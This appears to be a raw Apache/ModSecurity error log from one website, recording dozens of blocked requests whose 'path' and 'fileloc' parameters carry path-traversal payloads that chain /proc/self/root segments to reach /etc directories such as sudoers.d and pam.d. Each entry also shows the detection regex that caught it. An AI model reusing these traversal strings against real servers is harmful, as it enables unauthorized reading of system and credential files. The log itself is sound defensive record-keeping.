[Tue Mar 17 09:30:53.414505 2026] [:error] [pid 2473:tid 140411599251200] [client 74.7.241.46:39596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJfaBJNF7axNlVR0X8XQAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:54.757650 2026] [:error] [pid 2553:tid 140411616036608] [client 74.7.241.46:39608] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJfv0Bec_B9OkZP_i8-AAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:56.090160 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.241.46:39624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJgO82sZHvlq4xgHrCWwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:30:57.423151 2026] [:error] [pid 2553:tid 140411582465792] [client 74.7.241.46:39636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJgf0Bec_B9OkZP_i8_gAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:01.914206 2026] [:error] [pid 1731:tid 140411741927168] [client 74.7.241.46:56532] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJhAb2qCuy5irgBMjJIwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:03.279010 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:56554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJh-82sZHvlq4xgHrCXgAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:04.625828 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.241.46:56558] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJiNCmCSWTlPouqorL5gAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:05.855634 2026] [:error] [pid 1210:tid 140411658000128] [client 74.7.241.46:56564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJiVKJy4A1bGlmj9BVpQAAAko"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:07.171382 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.241.46:56574] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJi5DEJR9VXonE_-1O7AAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:08.783385 2026] [:error] [pid 2553:tid 140411691570944] [client 74.7.243.203:36084] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJjP0Bec_B9OkZP_i9BwAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:09.517507 2026] [:error] [pid 11469:tid 140411716749056] [client 74.7.241.46:38664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJjZDEJR9VXonE_-1O8QAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:10.109685 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:45624] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJjgeiSKl8TjouI-YCNwAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:31:11.442084 2026] [:error] [pid 2159:tid 140411733534464] [client 74.7.243.203:46670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJj_ct6CQ8jnRyg2p8IwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:11.871105 2026] [:error] [pid 2159:tid 140411741927168] [client 74.7.241.46:38684] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJj_ct6CQ8jnRyg2p8JgAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:12.799709 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:46684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkNCmCSWTlPouqorL6gAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:13.215745 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.46:38692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkaBJNF7axNlVR0X8ZQAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:14.137242 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:46686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkpqmL8PQht4WJFlH0QAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:14.526689 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.241.46:38692] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkqBJNF7axNlVR0X8aAAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:15.461826 2026] [:error] [pid 1731:tid 140411607643904] [client 74.7.243.203:46690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkwb2qCuy5irgBMjJJgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:15.918050 2026] [:error] [pid 1731:tid 140411590858496] [client 74.7.241.46:38704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJkwb2qCuy5irgBMjJJwAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:31:17.908434 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:46700] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJlZqmL8PQht4WJFlH0wAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:31:19.224496 2026] [:error] [pid 11293:tid 140411624429312] [client 74.7.243.203:46704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablJl9CmCSWTlPouqorL7AAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
